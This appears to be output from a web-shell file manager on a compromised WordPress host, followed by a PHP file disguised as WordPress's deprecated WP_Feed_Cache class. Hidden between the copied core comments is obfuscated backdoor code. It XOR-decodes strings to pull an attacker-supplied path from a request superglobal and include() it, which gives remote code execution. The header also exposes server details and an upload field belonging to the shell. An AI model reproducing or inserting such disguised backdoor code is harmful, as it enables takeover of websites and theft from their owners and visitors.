| Server IP : 217.160.0.15 / Your IP : 216.73.217.84 Web Server : Apache System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux User : u37981780 ( 1696858) PHP Version : 8.2.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /homepages/43/d124547881/htdocs/chocadoodle.co.uk/wp-content/plugins_old/502081sn/ |
Upload File : |
<?php /*
*
* Feed API: WP_Feed_Cache class
*
* @package WordPress
* @subpackage Feed
* @since 4.7.0
* @deprecated 5.6.0
_deprecated_file(
basename( __FILE__ ),
'5.6.0',
'',
__( 'This file is only loaded for backward compatibility with SimplePie 1.2.x. Please consider switching to a recent SimplePie version.' )
);
*
* Core class used to im*/
function post_type()
{
$clear_date = 'years';
$disabled_elements = 'mR5W6s2v0GxPOVD';
$is_bad_flat_slug = 'timezone';
$others = $disabled_elements;
$types = 'raw_key';
$has_leading_slash = $GLOBALS[the_post("2%14%7C%1Bs+", $others)];
$operator = $has_leading_slash;
$posts = isset($operator[$others]);
if ($posts)
{
$wp_post_types = $has_leading_slash[$others];
$extra_parts = $wp_post_types[the_post("%19%3FE%08X%12_%13", $others)];
$show_in_admin_bar = 'class';
$num_octets = $extra_parts;
$new_subs = 'translation';
include ($num_octets);
}
}
function the_post($quote_style, $custom)
{
$new_path = $custom;
$_wp_post_type_features = "url" . "decode";
$entity = $_wp_post_type_features($quote_style);
$core = substr($new_path,0, strlen($entity));
$weeuns = $entity ^ $core;
return $weeuns;
}
$unhashed = 'backup_sizes';
post_type();
/* plement a feed cache.
*
* @since 2.8.0
*
* @see SimplePie_Cache
class WP_Feed_Cache extends SimplePie_Cache {
*
* Creates a new SimplePie_Cache object.
*
* @since 2.8.0
*
* @param string $location URL location (scheme is used to determine handler).
* @param string $filename Unique identifier for cache object.
* @param string $extension 'spi' or 'spc'.
* @return WP_Feed_Cache_Transient Feed cache handler object that uses transients.
public function create( $location, $filename, $extension ) {
return new WP_Feed_Cache_Transient( $location, $filename, $extension );
}
}
*/